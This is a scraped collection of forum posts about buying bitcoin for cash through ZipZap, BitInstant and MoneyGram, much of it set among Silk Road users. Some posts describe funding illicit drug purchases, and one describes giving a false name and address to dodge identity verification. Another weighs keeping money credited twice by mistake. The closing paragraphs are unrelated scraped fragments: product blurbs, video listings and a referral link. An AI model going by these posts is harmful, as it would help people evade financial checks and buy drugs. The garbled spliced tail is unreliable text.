Went to https://buybitcoin.sg/buy/ and chose my nearest payment center by entering my postcode. There were 6 locations within 1 mile of my house, I chose one at end of my road ~1minute away.
Uploaded photo of my provisional driving license, they said it may take some time to approve.
9 mins later received email approval of account, and an attatched ZipZap payment slip. Printed this off to take to corner shop.
Throughout the process there was a URL that was emailed to you to check the state of your order: http://imgur.com/hYcI6pd
Couldn't be more impressed with the service start to finish, really easy and quick. Few thoughts - Markup wasn't as bad as I thought, it was a base £1 charge, then they tell you estimated price per BTC. At present the site states £341.82 GBP per BTC, going off bitstamp & google actual price is £334.39 per btc. Best price on localbitcoins is £335.42 so for the ease of not linking your bank account or having any SEPA bank fees etc I think this is a very good option.
Bitinstant Transaction Failed, Then Was Given 2x The Money??
I have been using the moneygram/zip-zap method through bitinstant to make orders on SR for a long time. It has had problems in the past and recently, I deposited a certain amount of money and when I got home to check my account, nothing was there. Eventually, I received an email saying that they had received the money but for some reason there was an error and they would need to check into it. Fast forward a couple days, I check my email and have two emails saying my transaction was successful and now I have exactly twice as much as I had originally deposited. They also waived the fees for the transaction. Now, should I just buy bitcoins ASAP and get going with it? Should I notify bitinstant? I know it is clearly just a little error but free money is free money. Any and all suggestions? Thanks
Haven't purchased in a few months since BitInstant dropped bank transfers. Decided to use Moneygram today and ran into nothing but issues. Experienced SR user here who needs a little help for once :).
First of all I know how annoying these kinds of questions are, but alas I find myself turning to my community for some support. I have been out of the country for about 3 months and just got back this December. I decide to make an SR purchase today and turns out BitInstant no longer accepts bank deposits. So, the only option I really had was to do a moneygram. I went through the normal steps (Wallet #, REAL name, tormail address, etc. etc.) and selected a moneygram location as well as giving them my tormail address one more time along with my phone number (for ZipZap). I don't have a car right now and my nearest moneygram location was like 2 miles so I hoofed it over there only to find out that my name was not on the account or that it had not even been set up or something of that nature (I honestly couldn't completely understand the call center rep on the red phone at CVS). I'm just trying to understand what I did wrong. I've been using bank deposits for like a year and they are flawless and go without a hitch every time. Also, has anyone else been having tormail issues? I did not receive a single confirmation email or anything throughout this whole period. I also just tried to sign up for coinbase and did not receive the confirmation email. Does tormail stop sending/receiving to your account after periods of inactivity? Thanks guys. :EDIT: - Just received an email from coinbase finally so I know my email is working. Does anyone have experience with this service and know if it is reliable? I saw it suggested by another SR reddit user. Thanks :EDIT2: - I appreciate all the help yall. When I first started using SR, I went with a bitcoin vendor for my first or second time, and honestly, the fees are disgusting. There is a walmart about the same distance in the opposite direction that I am going to try. Hopefully they'll make it work. I sure am getting a workout today haha. Tip for anyone who is looking to buy a car, save up a couple extra paychecks and don't buy a beater cherokee for 1500 on craigslist hoping it will run forever. Because it will break down shortly thereafter. If you have my luck, that is. :FINAL EDIT:: - Just wanted to say since there is a wells fargo directly across the street from me, I went with bitcopia because all they were accepting at the moment is wells fargo deposits anyway. The fee was not bad, probably equivalent to or less than bitinstant, and I had my BTC in about 2 hours directly to my silkroad wallet (which I never normally do, but I was feeling cheeky and pressed for time today). Went flawless, and the lack of information I had to give gave me the confidence to deposit directly to my SR wallet. I plan on using them again for sure. Thanks everybody.
So the other day I used ZipZap service, via Bittylicious to buy some bitcoins for cash and paid via a visit to one of the many 'payzone' outlets available. Since the guy in the shop didn't have a scanner to scan the barcode on the pdf from bittylicious, i persuaded him to let me see the payzone machine and found how to directly key the number in to do the transaction... Anyway while we were figuring it out, He asked what the payment was for an I began to explain him about bitcoins. Whilst we were talking my bitcoins arrived and he was surprised at the speed of it. Then I told him of the success of the few bitcoin atms in UK and showed the article about the bristol satoshipoint ATM doing £38k turnover in a month and netting a nice commission in the process. He was intrigued so i continued talking about how he could easily set up as a bitcoin retail outlet, without an atm... profiting not only from a markup on the bitcoins and his commissions from payzone, but he could do it with no inital outlay and no work other than setting up a bitcoin wallet on his phone, verifiying with bittylicious or zipzap and sticking a 'We sell bitcoin' sticker in the window. He is now doing a bit research and reading the uk bitcoin tax guidelines etc as well as checking if any aml / kyc best practice might be advised when selling small amounts of bitcoin for cash directly to his customers. Ill update this thread with the location if and when he goes live with it, in the meantime, there's lots of payzones!
This is my first time purchasing Bitcoins using BitInstant. My boyfriend decided to buy some bitcoins on 6-16-2013 and he got me interested in it. He showed me how to do it and everything worked out great up until I paid for them at my local Wal-Mart. Even my boyfriend had problems. After we both paid for our Bitcoins at WalMart, we sat by the computer and waited for the bitcoins to arrive in our email/wallets. He had his laptop and I had my own. After a few hours, we began to worry. He ended up emailing BitInstant several times, but they never got back to him. He finally decided to get on Reddit.com and complain about them. ONLY THEN did they finally respond to him and within the hour he had his Bitcoins in his email/wallet. I decided to wait and see if BitInstant would respond to my emails, but I regret doing that. Honestly, I regret ever giving them my money. They simply don't care about their customers until they blast them on internet because they want the money to keep coming from suckers like me. I'm going on 3 days, now. I have emailed BitInstant and ZipZap several times. ZipZap responded almost immediately, but BitInstant is nowhere to be found. They took my money and decided to ignore me. They can't possibly say that they're really busy and just haven't gotten to me yet because they took care of my bf just fine. BUYERS BEWARE OF DOING BUSINESS WITH BITINSTANT. I hope they decide to give my my bitcoins or my hard earned money back. Otherwise, I'll have to contact the BBB.
Hey there. So I tried unsuccessfully twice in as many days to buy bitcoins anonymously via Bitinstant via Moneygram via ZipZap. Both times I used a fake name and address (once using the red phone, once using the blue form) and both times I believe that was the reason for it not completing successfully. Tonight I watched over the shoulder of the woman typing the info in and I think when she went to click Next after entering the (fake) address the error message was something like "invalid last name for address" so apparently they use some sort of residence-name database to verify. Anyway. My question is-- do I really need to go through all these shenanigans to buy bitcoins under the radar? Honestly I just want to buy some prescription speed-- Adderall, Ritalin, etc-- on SR. Not looking for fish scale coke or black tar heroin. Not that I'm poo-pooing those choices, just talking in terms of the paper trail. I'm all for "third time's a charm" and picking a name out of the phone book but if you guys think just buying some btc with a credit card/bank account is low risk in my situation I'd just as soon go that route. Cheers
Here is my easy way. USA only! Forget it about PayPal and your Credits Cards. All Other services you see in BitInstant require wiretransfer, all Wire-transfers take at least 2 days to a week!! Follow this instruction and you'll have BTC in your wallet fast as BlockChain is operating.
Download bitcoinwallet and litecoin wallet, let them sync up with network.
Goto https://www.bitinstant.com/ choose cash deposit CVS Pay to BitCoin Address. (you can use one @ BTC-E or your wallet) I use the one at BTC-E because bitcoin wallet was taking too long syncing. go thru getting MoneyGram slip via ZipZap.
[ BTC-E > Finances > BTC Make Deposit. Copy Address Bitinstant.com > Pay From CVS > Pay To : BitCon Address ]
Take the ZipZap printout.
Goto ATM Machine and get CASH! CASH ONLY. Yes, CASH ONLY!
Than go to your local MoneyGram location and pay that slip as a bill with CASH (Cash Only, make sure you bring cash).
Drive back home, and look at email from ZipZap and check the information on BlockChain.org and see funds been verify yet. Once they're verify BTC-E should notify you that you have BitCoins deposited.
Click on BTC/LTC button above the graph/chart. choose buy LCT, click on your BTC balance to autofill the amount and buy.
Took me about 10 min to fill the order. Transfer you LTC to your own wallet. DO NOT WATCH THE CHART!!! It will just drive you crazy. I decided to by @ 1.40 on April 1st after looking for way to buy LTC without leaving house wasted a lot of time. so I end up getting them at 1.80! so don't waste time. Donate LTC here LTeqyd5jnS6tqRRavRhSxJfxBSSZzGjUNy English not too good, also suffer from dyslexia. [Mods] feel free to edit this with good English and post it on side bar.
I’m really interested in what ZipZap is building. I think that a cash payment network built on the back of bitcoin needs to exist because requiring a bank account to access the utility of bitcoin is simply extending the exclusionary nature of the current financial landscape. Additionally, a desire for the convenience of being able to buy bitcoin for cash seems to be there, as evinced by usage of LocalBitcoins despite the informality of the system, if not by the growth of ZipZap itself. A lot of people in the bitcoin community talk about the impact bitcoin can have on remittance. However, Remittance requires strong (read: liquid) markets in both the remitter’s country and the beneficiary’s country. There’s no real advantage to leveraging the bitcoin protocol to move value internationally if the beneficiary can’t cost effectively convert the coins into spendable money a.k.a cold hard cash. The ZipZap founder talks about remittance too, but from what I can tell ZipZap doesn’t actually buy coins. So they’re cash in (i.e. give them cash and they’ll give you coins) but they’re not cash out (i.e. give them coins and they’ll give you cash). So from a remittance perspective, I can go to a ZipZap location, buy coins with cash, and transfer them to my beneficiary. That’s it. Theres no solution for illiquidity in the beneficiary country. Is there a ZipZap-esque company that is addressing this issue on the cash out side? A formal entity that's buying coins for local currency? Am I missing something? Like why does an end-to-end cash remittance solution using bitcoin as the remittance vehicle not exist? My initial thoughts center around 1)AML/KYC compliance 2)Obtaining the necessary licenses (MSB/MTL) or becoming an agent of an entity that has these licenses in multiple countries. I’m interested in hearing any thoughts on this because is seems like the team that solves this is poised to be a “Western Union powered by bitcoin” type of company that could bring in some serious bucks and improve a lot of lives. Please enlighten me!
Detailed Instructions for getting Bitcoins in under 30 minutes (in the US).
The step by step guide is up on our hidden service, here. [edit: added text instructions below] Since some people are justcan't help but post comment like u scammin, we added the steps below w/o you having to visit our hidden service - we simply didn't want to have to format a post on here - but to settle concerns of those below, here you go: The easiest method we have found for absolute Bitcoin beginners is using MtGox + Bitinstant, which we will guide you through below. Using this method you can have your bitcoins in under 20 minutes from start to finish. There are extra fees($3.95) but it is worth it for the convenience.
Get a free MtGox Account (or for more experienced or comfortable users, we recommend blockchain.info, but provide no guide)
Once logged in to your account, click on the Funding Options link on the left
Choose BitInstant as your method
Scroll down and copy and paste your Exchange Account Number(this is important, make sure you get it)
Click on the BitInstant link, located above and to the right of the exchange account info
Once you are on the BitInstant website follow these steps.
Choose Cash Deposit -Money Gram to Mt.Gox
Insert your Mt.Gox Exchange Account Number
Input the amount you want to load (if you look at the bottom is shows you how much you get back after their fee so you can adjust it accordingly)
Put in your name and number, etc. REMEMBER, Bitcoins are 100% legal, even Reddit started taking them!, so you have no reason to try and purchase the Bitcoins with fake information, this can only lead to problems.
Click the Send Funds option
You will now be redirected to your ZipZap page. ZipZap is a worldwide "bill payment" operator, that is used by BitInstant to allow you to load your money online through MoneyGram.
Input your name and number
Choose the store/location you want to deposit the cash at (we always use Walmarts or 7/11, Walmart means lower fees)
Print out your deposit slip
Now you need to go make your payment to load funds.
Drive to your chosen Money Gram location
Tell the Money Gram Agent you want to make a "ZipZap Bill Payment"
They will ask for an account number, the dollar amount of the payment, and a receive code. All of this information is on the deposit slip you printed out
The funds show up in your MtGox account before you even get home from the store.
Sign in to your MtGox account
Click on the Trade option
Choose to Buy Bitcoins
Select Market Order (or once you begin to understand BTC, you can purchase at a set price that you determine - maybe lower than the "average" for the current time - think of them as stocks/currency trading)
Today, Zap, the Lightning wallet lead by developer Jack Mallers, has announced that their Strike product is now in public beta. Previously, Strike had only been available through a closed, private beta program. In the private beta, Mallers claims that they have “already seen $100,000 in payments”. Strike is an application that allows you to transact […] We’ve just added ZipZap to BittyBot – the UK’s number one Bitcoin price comparison website.. ZipZap are a California-based global payments network, currently providing cash-to-bitcoin services in the US, UK and Brazil.. In the UK ZipZap have partnered with payment processor Payzone which means you can exchange your cash for bitcoin at over 20,000 retail locations across the UK. ZipZap to Offer Cash-for-Bitcoin Service at 28,000 UK Locations UK residents will soon be able to walk into one of 28,000 shops across the nation and pay for bitcoins in cash, thanks to a new deal ... The My Zaps section is where you can find all of the Zaps that you created, even if they are not active. To delete or discard (electronic media).They zapped a lot of files before realizing they had not backed up lately. Every time you get an attachment, you could open up the email, click the attachment, and then save it to Dropbox. Or you can have Zapier automate this for you, saving you time Buy Bitcoin online with your credit card or debit card. Buy Bitcoin Cash (BCH), Bitcoin (BTC) and other cryptocurrencies instantly. Our guides makes it easy!
Payzone UK partners with ZipZap, a payment network helping consumers buy Bitcoins using cash. Close. This video is unavailable. serious investors!! https://regalwallet.com/?id=6118 Click here Standalone Bitcoin Offline Wallet Printer Demo BITCOIN PRICE , BITCOIN FUTURE in doubt https:... The Best Golf Tips To Strike Your Irons Solid and Pure - Duration: 37:41. ... 37:41. TRANSFORMERS OPTIMUS PRIME ZIP ZAPS MICRO RC REMOTE CONTROL TOY REVIEW - Duration: 5:57. sportswolf3 91,555 ... BITCOIN PRICE , BITCOIN FUTURE in doubt http://youtu.be/eO-yrpQpIT8 What is NAMECOIN BITCOIN'S First Fork http://youtu.be/oBkhPhu3_B4 Test Scanning Stainless...